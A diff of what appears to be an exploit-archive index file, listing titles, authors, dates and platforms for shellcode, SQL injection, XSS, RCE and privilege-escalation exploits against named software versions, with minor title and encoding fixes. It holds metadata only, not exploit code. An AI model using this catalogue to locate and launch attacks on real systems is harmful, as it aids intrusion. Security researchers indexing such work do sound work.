-35586,platforms/lin_x86-64/shellcode/35586.c,"x64 Linux bind TCP port shellcode (81 bytes, 96 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 -35587,platforms/lin_x86-64/shellcode/35587.c,"x64 Linux reverse TCP connect shellcode (77 to 85 bytes, 90 to 98 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 +35587,platforms/lin_x86-64/shellcode/35587.c,"x64 Linux reverse TCP connect shellcode (77 to 85 bytes_ 90 to 98 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) - LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000 35589,platforms/windows/dos/35589.py,"NotePad++ 6.6.9 - Buffer Overflow",2014-12-22,TaurusOmar,windows,dos,0 35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Local Privilege Escalation Vulnerability",2014-12-23,LiquidWorm,windows,local,0 -35591,platforms/php/webapps/35591.txt,"phpMyRecipes 1.2.2 - (browse.php, category param) SQL injection",2014-12-23,"Manish Tanwar",php,webapps,80 -35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash PoC",2014-12-23,"Drozdova Liudmila",windows,dos,0 +35591,platforms/php/webapps/35591.txt,"phpMyRecipes 1.2.2 - (browse.php category param) SQL injection",2014-12-23,"Manish Tanwar",php,webapps,80 35593,platforms/windows/webapps/35593.txt,"SysAid Server Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 35595,platforms/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local,0 @@ -32079,7 +32085,7 @@ id,file,description,date,author,platform,type,port 35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress 'general.php' Local and Remote File Include Vulnerabilities",2011-04-12,"Dr Trojan",php,webapps,0 35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For Wordpress Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 -35610,platforms/php/webapps/35610.txt,"Plogger 1.0 Rc1 - 'gallery_name' Parameter Cross-Site Scripting Vulnerability",2011-04-12,"High-Tech Bridge SA",php,webapps,0 +35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting Vulnerability",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injection Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - (.m3u8) Remote Buffer Overflow Vulnerability",2011-04-12,KedAns-Dz,windows,remote,0 35613,platforms/multiple/dos/35613.py,"TOTVS ERP Microsiga Protheus 8/10 Memory Corruption Denial Of Service Vulnerability",2011-04-13,waKKu,multiple,dos,0 @@ -32111,6 +32117,7 @@ id,file,description,date,author,platform,type,port 35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a - Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 +35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 Stored XSS Vulnerability",2014-12-31,"Halil Dalabasmaz",php,webapps,80 35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Parameter Cross-Site Scripting Vulnerability",2011-04-20,Kurd-Team,php,webapps,0 35647,platforms/php/webapps/35647.txt,"SyCtel Design 'menu' Parameter Multiple Local File Include Vulnerabilities",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 @@ -32118,34 +32125,28 @@ id,file,description,date,author,platform,type,port 35649,platforms/php/webapps/35649.txt,"todoyu 2.0.8 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0 35650,platforms/php/webapps/35650.py,"LightNEasy 3.2.3 - 'userhandle' Cookie Parameter SQL Injection Vulnerability",2011-04-21,"AutoSec Tools",php,webapps,0 35651,platforms/php/webapps/35651.txt,"Dolibarr 3.0 - Local File Include and Cross-Site Scripting Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 -35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 - Pre-Auth RCE",2014-12-30,drone,windows,remote,0 -35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Include and SQL Injection Vulnerabilities",2011-04-22,KedAns-Dz,php,webapps,0 -35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service Vulnerability",2011-04-25,"Antu Sanadi",windows,dos,0 +35652,platforms/windows/remote/35652.sh,"Liferay Portal 7.0.0 M1_ 7.0.0 M2_ 7.0.0 M3 - Pre-Auth RCE",2014-12-30,drone,windows,remote,0 +35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting and SQL Injection Vulnerabilities",2011-04-26,Ma3sTr0-Dz,php,webapps,0 35655,platforms/php/webapps/35655.txt,"TemaTres 1.3 - '_search_expresion' Parameter Cross-Site Scripting Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 35656,platforms/windows/dos/35656.pl,"eXPert PDF 7.0.880.0 - (.pj) Heab-based Buffer Overflow Vulnerability",2011-04-25,KedAns-Dz,windows,dos,0 -35657,platforms/php/webapps/35657.php,"Sermon Browser WordPress Plugin 0.43 - Cross-Site Scripting and SQL Injection Vulnerabilities",2011-04-26,Ma3sTr0-Dz,php,webapps,0 +35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35664,platforms/php/webapps/35664.txt,"PHPList 2.10.x - 'email' Parameter Cross-Site Scripting Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35658,platforms/php/webapps/35658.txt,"html-edit CMS 3.1.x - 'html_output' Parameter Cross-Site Scripting Vulnerability",2011-04-26,KedAns-Dz,php,webapps,0 -35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 Stored XSS Vulnerability",2014-12-31,"Halil Dalabasmaz",php,webapps,80 35660,platforms/php/remote/35660.rb,"ProjectSend Arbitrary File Upload",2014-12-31,metasploit,php,remote,80 35661,platforms/windows/local/35661.txt,"Windows 8.1 (32/64 bit) - Privilege Escalation (ahcache.sys/NtApphelpCacheControl)",2015-01-01,"Google Security Research",windows,local,0 -35662,platforms/php/webapps/35662.txt,"Noah's Classifieds 5.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35654,platforms/windows/dos/35654.py,"AT-TFTP Server 1.8 - 'Read' Request Remote Denial of Service Vulnerability",2011-04-25,"Antu Sanadi",windows,dos,0 35663,platforms/php/webapps/35663.txt,"WP Ajax Recent Posts WordPress Plugin 1.0.1 - 'do' Parameter Cross-Site Scripting Vulnerability",2011-04-26,"High-Tech Bridge SA",php,webapps,0 -35664,platforms/php/webapps/35664.txt,"PHPList 2.10.x - 'email' Parameter Cross-Site Scripting Vulnerabilities",2011-04-26,"High-Tech Bridge SA",php,webapps,0 +35653,platforms/php/webapps/35653.txt,"Nuke Evolution Xtreme 2.0 - Local File Include and SQL Injection Vulnerabilities",2011-04-22,KedAns-Dz,php,webapps,0 35665,platforms/php/webapps/35665.txt,"PHP F1 Max's Photo Album - 'showimage.php' Cross-Site Scripting Vulnerability",2011-04-26,"High-Tech Bridge SA",php,webapps,0 35666,platforms/php/webapps/35666.txt,"Football Website Manager 1.1 SQL Injection and Multiple HTML Injection Vulnerabilities",2011-04-26,RoAd_KiLlEr,php,webapps,0 35667,platforms/php/webapps/35667.txt,"Joostina - Multiple Components SQL Injection Vulnerability",2011-04-27,KedAns-Dz,php,webapps,0 35668,platforms/php/webapps/35668.txt,"up.time Software 5 Administration Interface Remote Authentication Bypass Vulnerability",2011-04-27,"James Burton",php,webapps,0 -35670,platforms/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rsemann",php,webapps,80 +35670,platforms/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",php,webapps,80 35671,platforms/windows/local/35671.rb,"i-FTP Schedule Buffer Overflow",2015-01-01,metasploit,windows,local,0 -35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager <= 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection Vulnerabilities",2011-04-27,"Alberto Revelli",jsp,webapps,0 -35673,platforms/php/webapps/35673.txt,"WordPress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 -35674,platforms/php/webapps/35674.txt,"WordPress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting Vulnerability",2011-04-28,"High-Tech Bridge SA",php,webapps,0 -35675,platforms/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",php,webapps,0 -35676,platforms/cgi/webapps/35676.txt,"BackupPC 3.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",cgi,webapps,0 35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 Image File Handling HTML Injection Vulnerability",2011-04-25,"Alberto Ortega",php,webapps,0 35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13 b 'theme_dir' Parameter Cross-Site Scripting Vulnerability",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - XSS Vulnerability",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 -35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Include and Arbitrary File Upload Vulnerabilities",2011-04-28,KedAns-Dz,php,webapps,0 +35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Include and Arbitrary File Upload Vulnerabilities",2011-04-28,KedAns-Dz,php,webapps,0 35681,platforms/linux/local/35681.txt,"OProfile 0.9.6 'opcontrol' Utility 'set_event()' Local Privilege Escalation Vulnerability",2011-04-29,"Stephane Chauveau",linux,local,0 35682,platforms/php/webapps/35682.txt,"Tine 2.0 'vbook.php' Cross Site Scripting Vulnerability",2011-04-30,"AutoSec Tools",php,webapps,0 35683,platforms/java/webapps/35683.txt,"LANSA aXes Web Terminal TN5250 'axes_default.css' Cross Site Scripting Vulnerability",2011-05-02,"Patrick Webster",java,webapps,0 @@ -32153,12 +32154,15 @@ id,file,description,date,author,platform,type,port 35685,platforms/multiple/remote/35685.txt,"Asterisk 1.8.x SIP INVITE Request User Enumeration Weakness",2011-05-02,"Francesco Tornieri",multiple,remote,0 35686,platforms/windows/remote/35686.pl,"OpenMyZip 0.1 - (.zip) File Buffer Overflow Vulnerability",2011-05-02,"C4SS!0 G0M3S",windows,remote,0 35688,platforms/hardware/remote/35688.py,"ASUSWRT 3.0.0.4.376_1071 - LAN Backdoor Command Execution",2015-01-04,"Friedrich Postelstorfer",hardware,remote,0 -35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 -35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0 -35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0 -35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 'process.cgi' Cross Site Scripting Vulnerability",2011-05-03,"Karan Khosla",cgi,webapps,0 35699,platforms/php/webapps/35699.txt,"E2 Photo Gallery 0.9 'index.php' Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35700,platforms/php/webapps/35700.txt,"YaPIG 0.95 Multiple Cross Site Scripting Vulnerabilities",2011-05-03,"High-Tech Bridge SA",php,webapps,0 +35697,platforms/php/webapps/35697.txt,"Web Auction 0.3.6 'lang' Parameter Cross Site Scripting Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0 +35698,platforms/cgi/webapps/35698.txt,"Proofpoint Protection Server 5.5.5 'process.cgi' Cross Site Scripting Vulnerability",2011-05-03,"Karan Khosla",cgi,webapps,0 +35694,platforms/windows/remote/35694.txt,"SkinCrafter3 vs2005 3.8.1.0 - Multiple ActiveX Buffer Overflows",2015-01-05,metacom,windows,remote,0 +35691,platforms/php/webapps/35691.txt,"Crea8Social 2.0 - XSS Change Interface",2015-01-04,"Yudhistira B W",php,webapps,0 +35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload Vulnerability",2011-05-08,KedAns-Dz,php,webapps,0 +35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0 +35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0 35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 'uploadername' Parameter Cross Site Scripting Vulnerability",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products 'theme_dir' Parameter Cross Site Scripting Vulnerability",2011-05-03,Hector.x90,php,webapps,0 35703,platforms/multiple/remote/35703.py,"sipdroid <= 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 @@ -32170,9 +32174,6 @@ id,file,description,date,author,platform,type,port 35709,platforms/php/webapps/35709.txt,"e107 0.7.25 'news.php' SQL Injection Vulnerability",2011-05-07,KedAns-Dz,php,webapps,0 35710,platforms/php/webapps/35710.py,"AdaptCMS 3.0.3 - Multiple Vulnerabilities",2015-01-06,LiquidWorm,php,webapps,80 35711,platforms/android/local/35711.c,"Nexus 5 Android 5.0 - Local Root Exploit",2015-01-06,retme,android,local,0 -35712,platforms/windows/local/35712.rb,"BulletProof FTP Client BPS Buffer Overflow",2015-01-06,metasploit,windows,local,0 -35713,platforms/php/webapps/35713.txt,"FestOS 2.3c 'upload.php' Arbitrary File Upload Vulnerability",2011-05-08,KedAns-Dz,php,webapps,0 -35714,platforms/windows/remote/35714.pl,"BlueVoda Website Builder 11 '.bvp' File Stack-Based Buffer Overflow Vulnerability",2011-05-09,KedAns-Dz,windows,remote,0 35715,platforms/php/webapps/35715.txt,"encoder 0.4.10 'edit.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 35716,platforms/php/webapps/35716.html,"Ampache 3.5.4 'login.php' Cross Site Scripting Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 35717,platforms/php/webapps/35717.txt,"Exponent CMS 2.0.0 beta 1.1 Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-09,"AutoSec Tools",php,webapps,0 @@ -32180,7 +32181,7 @@ id,file,description,date,author,platform,type,port 35719,platforms/php/webapps/35719.py,"phpWebSite 1.7.1 'upload.php' Arbitrary File Upload Vulnerability",2011-05-09,"AutoSec Tools",php,webapps,0 35720,platforms/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",php,webapps,80 35721,platforms/hardware/webapps/35721.txt,"Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure",2015-01-07,"Eduardo Novella",hardware,webapps,80 -35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rsemann",php,webapps,80 +35722,platforms/php/webapps/35722.txt,"Sefrengo CMS 1.6.0 - SQL Injection",2015-01-07,"Steffen Rösemann",php,webapps,80 35723,platforms/php/webapps/35723.txt,"TCExam 11.1.29 'tce_xml_user_results.php' Multiple SQL Injection Vulnerabilities",2011-05-01,"AutoSec Tools",php,webapps,0 35724,platforms/php/webapps/35724.txt,"EmbryoCore 1.03 'index.php' SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0 35725,platforms/multiple/dos/35725.pl,"Perl 5.10 Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-05-03,"Jonathan Brossard",multiple,dos,0 @@ -32189,9 +32190,9 @@ id,file,description,date,author,platform,type,port 35728,platforms/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 Multiple Cross Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",asp,webapps,0 35729,platforms/multiple/remote/35729.txt,"Imperva SecureSphere SQL Query Filter Security Bypass Vulnerability",2011-05-09,@drk1wi,multiple,remote,0 35730,platforms/php/webapps/35730.txt,"WordPress Shopping Cart 3.0.4 - Unrestricted File Upload",2015-01-08,"Kacper Szurek",php,webapps,80 -35731,platforms/php/remote/35731.rb,"Pandora v3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80 +35731,platforms/php/remote/35731.rb,"Pandora 3.1 - Auth Bypass and Arbitrary File Upload Vulnerability",2015-01-08,metasploit,php,remote,80 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0 -35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion, SQL Injection & XSS",2015-01-09,Technidev,php,webapps,80 +35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion_ SQL Injection & XSS",2015-01-09,Technidev,php,webapps,80 35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0 35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0 35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0 @@ -32204,10 +32205,11 @@ id,file,description,date,author,platform,type,port 35743,platforms/multiple/webapps/35743.txt,"Flash Tag Cloud And MT-Cumulus Plugin 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-05-13,MustLive,multiple,webapps,0 35744,platforms/windows/remote/35744.pl,"AVS Ringtone Maker 1.6.1 '.au' File Remote Buffer Overflow Vulnerability",2011-05-16,KedAns-Dz,windows,remote,0 35745,platforms/php/webapps/35745.txt,"Joomla! 'com_cbcontact' Component 'contact_id' Parameter SQL Injection Vulnerability",2011-05-16,KedAns-Dz,php,webapps,0 -35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ?sfan55",linux,local,0 +35746,platforms/linux/local/35746.sh,"RedStar 3.0 Desktop - Privilege Escalation (Enable sudo)",2015-01-11,"prdelka & ‏sfan55",linux,local,0 35747,platforms/hardware/webapps/35747.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Wlsecrefresh.wl & Wlsecurity.wl",2015-01-11,"Mauricio Correa",hardware,webapps,0 35748,platforms/linux/local/35748.txt,"RedStar 2.0 Desktop - Privilege Escalation (World-writeable rc.sysinit)",2015-01-11,prdelka,linux,local,0 35749,platforms/linux/local/35749.txt,"RedStar 3.0 Desktop - Privilege Escalation (Software Manager - swmng.app)",2015-01-11,RichardG,linux,local,0 +35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit DnsProxy.cmd",2015-01-11,"Mauricio Correa",hardware,webapps,0 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"Mauricio Correa",hardware,webapps,0 35752,platforms/php/webapps/35752.txt,"Mambo 'com_docman' 1.3.0 Component Multiple SQL Injection Vulnerabilities",2011-05-16,KedAns-Dz,php,webapps,0 @@ -32216,7 +32218,6 @@ id,file,description,date,author,platform,type,port 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 'history.php' Cross Site Scripting Vulnerability",2011-05-12,"AutoSec Tools",php,webapps,0 35756,platforms/php/webapps/35756.txt,"openQRM 4.8 'source_tab' Parameter Cross Site Scripting Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0 35757,platforms/php/webapps/35757.txt,"eFront <= 3.6.9 'scripts.php' Local File Include Vulnerability",2011-05-16,"AutoSec Tools",php,webapps,0 -35758,platforms/asp/webapps/35758.txt,"Mitel Audio and Web Conferencing 4.4.3.0 Multiple Cross Site Scripting Vulnerabilities",2011-05-16,"Richard Brain",asp,webapps,0 35759,platforms/php/webapps/35759.txt,"eFront 3.6.9 'submitScore.php' Cross Site Scripting Vulnerability",2011-05-16,"John Leitch",php,webapps,0 35760,platforms/php/webapps/35760.txt,"PHP Calendar Basic 2.3 Multiple Cross Site Scripting Vulnerabilities",2011-05-17,"High-Tech Bridge SA",php,webapps,0 35761,platforms/php/webapps/35761.txt,"TWiki <= 5.0.1 'origurl' Parameter Cross Site Scripting Vulnerability",2011-05-18,"Mesut Timur",php,webapps,0 @@ -32226,6 +32227,8 @@ id,file,description,date,author,platform,type,port 35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager <= 8.5 iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager <= 8.5 iptm/logicalTopo.do Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80 +35998,platforms/php/webapps/35998.txt,"CobraScripts Trading Marketplace Script 'cid' Parameter SQL Injection Vulnerability",2011-07-25,Ehsan_Hp200,php,webapps,0 +35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80 35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623 35771,platforms/osx/dos/35771.c,"OS X 10.10 Bluetooth DispatchHCICreateConnection - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 35772,platforms/osx/dos/35772.c,"OS X 10.10 Bluetooth BluetoothHCIChangeLocalName - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 @@ -32242,7 +32245,6 @@ id,file,description,date,author,platform,type,port 35783,platforms/php/webapps/35783.html,"Andy's PHP Knowledgebase 0.95.4 'step5.php' Remote PHP Code Execution Vulnerability",2011-05-19,"AutoSec Tools",php,webapps,0 35784,platforms/linux/remote/35784.php,"Zend Framework <= 1.11.4 'PDO_MySql' Security Bypass Vulnerability",2011-05-19,"Anthony Ferrara",linux,remote,0 35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 DHCP Options Processing Remote Shell Command Execution Vulnerability",2011-05-18,"maximilian attems",linux,remote,0 -35786,platforms/multiple/webapps/35786.txt,"Ansible Tower 2.0.2 - Multiple Vulnerabilities",2015-01-14,"SEC Consult",multiple,webapps,80 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ 'admin.php' Cross Site Scripting Vulnerability",2011-05-19,"Juan Manuel Garcia",php,webapps,0 35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component 'cid' Parameter SQL Injection Vulnerability",2011-05-23,FL0RiX,php,webapps,0 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 Multiple Cross Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -32251,6 +32253,8 @@ id,file,description,date,author,platform,type,port 35792,platforms/multiple/remote/35792.txt,"Gadu-Gadu Instant Messenger 6.0 File Transfer Cross Site Scripting Vulnerability",2011-05-24,"Kacper Szczesniak",multiple,remote,0 35793,platforms/win32/shellcode/35793.txt,"Obfuscated Shellcode Windows x86 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win32,shellcode,0 35794,platforms/win64/shellcode/35794.txt,"Obfuscated Shellcode Windows x64 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP Group & Enable RDP From Registry & STOP Firewall & Auto Start Terminal Service",2015-01-13,"Ali Razmjoo",win64,shellcode,0 +35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection Vulnerabilities",2011-05-30,KedAns-Dz,php,webapps,0 +35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 'libnvbasics.dll' Remote Denial of Service Vulnerability",2011-05-28,"Luigi Auriemma",windows,dos,0 35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder Local File Include and Arbitrary File Upload Vulnerabilities",2011-05-25,KedAns-Dz,php,webapps,0 35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component SQL Injection Vulnerability",2011-05-25,"ThunDEr HeaD",php,webapps,0 35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 '_kurl' Parameter Cross Site Scripting Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0 @@ -32258,8 +32262,6 @@ id,file,description,date,author,platform,type,port 35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera UDP Packet Password Information Disclosure Vulnerability",2011-05-25,"Spare Clock Cycles",hardware,remote,0 35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0 35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 'keywordraw' Parameter Cross Site Scripting Vulnerability",2011-05-25,"Matt Jezorek",cgi,webapps,0 -35803,platforms/php/webapps/35803.txt,"Cotonti 0.9.2 Multiple SQL Injection Vulnerabilities",2011-05-30,KedAns-Dz,php,webapps,0 -35804,platforms/windows/dos/35804.txt,"NetVault: SmartDisk 1.2 'libnvbasics.dll' Remote Denial of Service Vulnerability",2011-05-28,"Luigi Auriemma",windows,dos,0 35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 Remote Code Execution Vulnerability",2011-05-28,"Kacper Szczesniak",multiple,remote,0 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 Unspecified Remote Buffer Overflow Vulnerability",2011-05-27,"Kevin R.V",windows,remote,0 35807,platforms/asp/webapps/35807.txt,"Kentico CMS 5.5R2.23 'userContextMenu_parameter' Parameter Cross Site Scripting Vulnerability",2011-05-31,LiquidWorm,asp,webapps,0 @@ -32269,9 +32271,9 @@ id,file,description,date,author,platform,type,port 35811,platforms/windows/local/35811.txt,"Windows < 8.1 (32/64 bit) - Privilege Escalation (User Profile Service) (MS15-003)",2015-01-18,"Google Security Research",windows,local,0 35812,platforms/windows/local/35812.py,"T-Mobile Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0 35813,platforms/windows/local/35813.py,"Congstar Internet Manager - SEH Buffer Overflow",2015-01-18,metacom,windows,local,0 -35814,platforms/php/webapps/35814.txt,"TEDE Simplificado v1.01/vS2.04 Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 +35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injection Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 35815,platforms/php/webapps/35815.pl,"PikaCMS Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 -35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0 +35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-06-01,"High-Tech Bridge SA",php,webapps,0 35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 